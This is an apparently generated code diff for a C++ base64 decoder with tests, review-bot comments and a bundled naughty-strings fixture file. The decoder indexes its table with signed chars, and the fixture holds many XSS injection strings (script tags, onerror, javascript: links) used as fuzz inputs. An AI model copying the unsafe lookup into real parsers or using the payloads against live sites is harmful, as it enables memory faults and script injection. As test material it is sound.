nop, nop, nop, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, + 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, + 25, nop, nop, nop, nop, nop, nop, 26, 27, 28, 29, 30, 31, 32, 33, + 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop}; + + unsigned int input_length = input.size(); + + // allocate space for output string + output.clear(); + output.reserve(((input_length + 2) / 3) * 4); + + // for each 4-bytes sequence from the input, extract 4 6-bits sequences by + // droping first two bits + // and regenerate into 3 8-bits sequence + + for (unsigned int i = 0; i < input_length; i++) { + char base64code0; + char base64code1; + char base64code2 = 0; // initialized to 0 to suppress warnings + char base64code3; + + base64code0 = decoding_data[static_cast<int>(input[i])]; + if (base64code0 == nop) // non base64 character + return false; + if (!(++i < input_length)) // we need at least two input bytes for first + // byte output + return false; + base64code1 = decoding_data[static_cast<int>(input[i])]; + if (base64code1 == nop) // non base64 character + return false; + + output += ((base64code0 << 2) | ((base64code1 >> 4) & 0x3)); + + if (++i < input_length) { + char c = input[i]; + if (c == '=') { // padding , end of input + assert((base64code1 & 0x0f) == 0); + return true; + } + 
base64code2 = decoding_data[static_cast<int>(input[i])]; + if (base64code2 == nop) // non base64 character + return false; + + output += ((base64code1 << 4) & 0xf0) | ((base64code2 >> 2) & 0x0f); + } + + if (++i < input_length) { + char c = input[i]; + if (c == '=') { // padding , end of input + assert((base64code2 & 0x03) == 0); + return true; + } + base64code3 = decoding_data[static_cast<int>(input[i])]; + if (base64code3 == nop) // non base64 character + return false; + + output += (((base64code2 << 6) & 0xc0) | base64code3); + } + } + + return true; +} + +}
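Review bot: `decoding_data[static_cast<int>(input[i])]` indexes the 256-entry table with a plain `char`, so on targets where `char` is signed any input byte at or above 0x80 becomes a negative index and reads before the table — undefined behaviour in a decoder that is going to be fed attacker-controlled header data; cast through `unsigned char` at all four lookups: `decoding_data[static_cast<unsigned char>(input[i])]`. The two `assert(...)` calls on the padding path check an input-controlled condition, so in a debug build a malformed string such as `"Zh=="` aborts the process and in a release build it is silently accepted; replace them with `if ((base64code1 & 0x0f) != 0) return false;` and `if ((base64code2 & 0x03) != 0) return false;`. Smaller points: `output.reserve(((input_length + 2) / 3) * 4)` in decode is the encoder's sizing formula (the decoder needs at most `(input_length / 4) * 3`), and a lone `=` with no fourth character, e.g. `"Zg="`, is accepted as valid, so padding is not strictly validated.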
\ No newline at end of file diff --git a/src/base64_test.cpp b/src/base64_test.cpp new file mode 100644 index 0000000000..3484976034 --- /dev/null +++ b/src/base64_test.cpp 
@@ -0,0 +1,62 @@
+#include "base64.hpp"
+#include "gtest/gtest.h"
+#include "big_list_of_naughty_strings.hpp"
+
+// Tests that Base64 basic strings work
+TEST(Base64, EncodeBasicString)
+{
+ std::string output;
+ EXPECT_TRUE(base64::base64_encode("Foo", output));
+}
+
+// Tests the test vectors available in the base64 spec
+TEST(Base64, EncodeRFC4648)
+{
+ std::string output;
+ EXPECT_TRUE(base64::base64_encode("", output));
+ EXPECT_EQ(output, "");
+ EXPECT_TRUE(base64::base64_encode("f", output));
+ EXPECT_EQ(output, "Zg==");
+ EXPECT_TRUE(base64::base64_encode("fo", output));
+ EXPECT_EQ(output, "Zm8=");
+ EXPECT_TRUE(base64::base64_encode("foo", output));
+ EXPECT_EQ(output, "Zm9v");
+ EXPECT_TRUE(base64::base64_encode("foob", output));
+ EXPECT_EQ(output, "Zm9vYg==");
+ EXPECT_TRUE(base64::base64_encode("fooba", output));
+ EXPECT_EQ(output, "Zm9vYmE=");
+ EXPECT_TRUE(base64::base64_encode("foobar", output));
+ EXPECT_EQ(output, "Zm9vYmFy");
+}
+
+// Tests the test vectors available in the base64 spec
+TEST(Base64, DecodeRFC4648)
+{
+ std::string output;
+ EXPECT_TRUE(base64::base64_decode("", output));
+ EXPECT_EQ(output, "");
+ EXPECT_TRUE(base64::base64_decode("Zg==", output));
+ EXPECT_EQ(output, "f");
+ EXPECT_TRUE(base64::base64_decode("Zm8=", output));
+ EXPECT_EQ(output, "fo");
+ EXPECT_TRUE(base64::base64_decode("Zm9v", output));
+ EXPECT_EQ(output, "foo");
+ EXPECT_TRUE(base64::base64_decode("Zm9vYg==", output));
+ EXPECT_EQ(output, "foob");
+ EXPECT_TRUE(base64::base64_decode("Zm9vYmE=", output));
+ EXPECT_EQ(output, "fooba");
+ EXPECT_TRUE(base64::base64_decode("Zm9vYmFy", output));
+ EXPECT_EQ(output, "foobar");
+}
+
+// Tests using pathalogical cases for all escapings
+TEST(Base64, NaugtyStrings){
+ std::string base64_string;
+ std::string decoded_string;
+ for (auto& str: naughty_strings){
+ EXPECT_TRUE(base64::base64_encode(str, base64_string));
+ EXPECT_TRUE(base64::base64_decode(base64_string, decoded_string));
+ EXPECT_EQ(str, decoded_string);
+ }
+}
+
diff --git a/src/blns.txt b/src/blns.txt
new file mode 100644
index 0000000000..cdbac02377
--- /dev/null
+++ b/src/blns.txt
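Review bot: Every decoder test here feeds `base64_decode` well-formed ASCII — including `NaugtyStrings`, whose decode input is always the encoder's own output — so the rejection paths (non-alphabet byte, truncated group) are never exercised even though this decoder will parse untrusted header data. Add negative cases next to `DecodeRFC4648`, e.g. `EXPECT_FALSE(base64::base64_decode("Zm9v!", output));` and `EXPECT_FALSE(base64::base64_decode("Z", output));`, and one input containing bytes at or above 0x80 such as `"\xff\xfe"`, which today reaches the `static_cast<int>(input[i])` table lookup with a negative index (it should return false once that lookup casts through `unsigned char`). Minor: the test names `NaugtyStrings` and comment `pathalogical` are misspelled, and `base64_string`/`decoded_string` are reused across iterations relying on the callee to `clear()` them, which is worth a one-line comment.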
@@ -0,0 +1,685 @@ +# sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + +# Reserved Strings +# +# Strings which may be used elsewhere in code + +undefined +undef +null +NULL +(null) +nil +NIL +true +false +True +False +TRUE +FALSE +None +hasOwnProperty +\ +\\ + +# Numeric Strings +# +# Strings which can be interpreted as numeric + +0 +1 +1.00 +$1.00 +1/2 +1E2 +1E02 +1E+02 +-1 +-1.00 +-$1.00 +-1/2 +-1E2 +-1E02 +-1E+02 +1/0 +0/0 +-2147483648/-1 +-9223372036854775808/-1 +-0 +-0.0 ++0 ++0.0 +0.00 +0..0 +. +0.0.0 +0,00 +0,,0 +, +0,0,0 +0.0/0 +1.0/0.0 +0.0/0.0 +1,0/0,0 +0,0/0,0 +--1 +- +-. +-, +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +NaN +Infinity +-Infinity +INF +1#INF +-1#IND +1#QNAN +1#SNAN +1#IND +0x0 +0xffffffff +0xffffffffffffffff +0xabad1dea +123456789012345678901234567890123456789 +1,000.00 +1 000.00 +1'000.00 +1,000,000.00 +1 000 000.00 +1'000'000.00 +1.000,00 +1 000,00 +1'000,00 +1.000.000,00 +1 000 000,00 +1'000'000,00 +01000 +08 +09 +2.2250738585072011e-308 + +# Special Characters +# +# ASCII punctuation. All of these characters may need to be escaped in some +# contexts. Divided into three groups based on (US-layout) keyboard position. + +,./;'[]\-= +<>?:"{}|_+ +!@#$%^&*()`~ + +# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, +# and U+007F (DEL) +# Often forbidden to appear in various text-based file formats (e.g. XML), +# or reused for internal delimiters on the theory that they should never +# appear in input. +# The next line may appear to be blank or mojibake in some viewers. + + +# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. +# Commonly misinterpreted as additional graphic characters. +# The next line may appear to be blank, mojibake, or dingbats in some viewers. 
+ + +# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode +# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), +# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often +# treated as whitespace in some contexts. +# This file unfortunately cannot express strings containing +# U+0000, U+000A, or U+000D (NUL, LF, CR). +# The next line may appear to be blank or mojibake in some viewers. +# The next line may be flagged for "trailing whitespace" in some viewers. +
+ +# Unicode additional control characters: all of the characters with +# general category Cf (in Unicode 8.0.0). +# The next line may appear to be blank or mojibake in some viewers. + + +# "Byte order marks", U+FEFF and U+FFFE, each on its own line. +# The next two lines may appear to be blank or mojibake in some viewers. + + + +# Unicode Symbols +# +# Strings which contain common unicode symbols (e.g. smart quotes) + +Ω≈ç√∫˜µ≤≥÷ +åß∂ƒ©˙∆˚¬…æ +œ∑´®†¥¨ˆøπ“‘ +¡™£¢∞§¶•ªº–≠ +¸˛Ç◊ı˜Â¯˘¿ +ÅÍÎÏ˝ÓÔÒÚÆ☃ +Œ„´‰ˇÁ¨ˆØ∏”’ +`⁄€‹›fifl‡°·‚—± +⅛⅜⅝⅞ +ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя +٠١٢٣٤٥٦٧٨٩ + +# Unicode Subscript/Superscript/Accents +# +# Strings which contain unicode subscripts/superscripts; can cause rendering issues + +⁰⁴⁵ +₀₁₂ +⁰⁴⁵₀₁₂ +ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ + +# Quotation Marks +# +# Strings which contain misplaced quotation marks; can cause encoding errors + +' +" +'' +"" +'"' +"''''"'" +"'"'"''''" +<foo val=“bar” /> +<foo val=“bar” /> +<foo val=”bar“ /> +<foo val=`bar' /> + +# Two-Byte Characters +# +# Strings which contain two-byte characters: can cause rendering issues or character-length issues + +田中さんにあげて下さい +パーティーへ行かないか +和製漢語 +部落格 +사회과학원 어학연구소 +찦차를 타고 온 펲시맨과 쑛다리 똠방각하 +社會科學院語學研究所 +울란바토르 +𠜎𠜱𠝹𠱓𠱸𠲖𠳏 + +# Changing length when lowercased +# +# Characters which increase in length (2 to 3 bytes) when lowercased +# Credit: https://twitter.com/jifa/status/625776454479970304 + +Ⱥ +Ⱦ + +# Japanese Emoticons +# +# Strings which consists of Japanese-style emoticons which are popular on the web + +ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ +(。◕ ∀ ◕。) +`ィ(´∀`∩ +__ロ(,_,*) +・( ̄∀ ̄)・:*: +゚・✿ヾ╲(。◕‿◕。)╱✿・゚ +,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ +(╯°□°)╯︵ ┻━┻) +(ノಥ益ಥ)ノ ┻━┻ +┬─┬ノ( º _ ºノ) +( ͡° ͜ʖ ͡°) + +# Emoji +# +# Strings which 
contain Emoji; should be the same behavior as two-byte characters, but not always + +😍 +👩🏽 +👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 +🐵 🙈 🙉 🙊 +❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 +✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 +🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 +0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 + +# Regional Indicator Symbols +# +# Regional Indicator Symbols can be displayed differently across +# fonts, and have a number of special behaviors + +🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 +🇺🇸🇷🇺🇸🇦🇫🇦🇲 +🇺🇸🇷🇺🇸🇦 + +# Unicode Numbers +# +# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + +123 +١٢٣ + +# Right-To-Left Strings +# +# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + +ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. +בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ +הָיְתָהtestالصفحات التّحول +﷽ +ﷺ +مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، + +# Trick Unicode +# +# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + +test +test +
test
+testtest +test + +# Zalgo Text +# +# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + +Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ +̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ +̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ +̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ +Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ + +# Unicode Upsidedown +# +# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) + +˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ +00˙Ɩ$- + +# Unicode font +# +# Strings which contain bold/italic/etc. 
versions of normal characters + +The quick brown fox jumps over the lazy dog +𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 +𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 +𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 +𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 +𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 +𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 +⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ + +# Script Injection +# +# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + +<script>alert(123)</script> +<script>alert('123');</script> +<img src=x onerror=alert(123) /> +<svg><script>123<1>alert(123)</script> +"><script>alert(123)</script> +'><script>alert(123)</script> +><script>alert(123)</script> +</script><script>alert(123)</script> +< / script >< script >alert(123)< / script > + onfocus=JaVaSCript:alert(123) autofocus +" onfocus=JaVaSCript:alert(123) autofocus +' onfocus=JaVaSCript:alert(123) autofocus +<script>alert(123)</script> +<sc<script>ript>alert(123)</sc</script>ript> +--><script>alert(123)</script> +";alert(123);t=" +';alert(123);t=' +JavaSCript:alert(123) +;alert(123); +src=JaVaSCript:prompt(132) +"><script>alert(123);</script x=" +'><script>alert(123);</script x=' +><script>alert(123);</script x= +" autofocus onkeyup="javascript:alert(123) +' autofocus onkeyup='javascript:alert(123) +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div 
style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x 
\x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> 
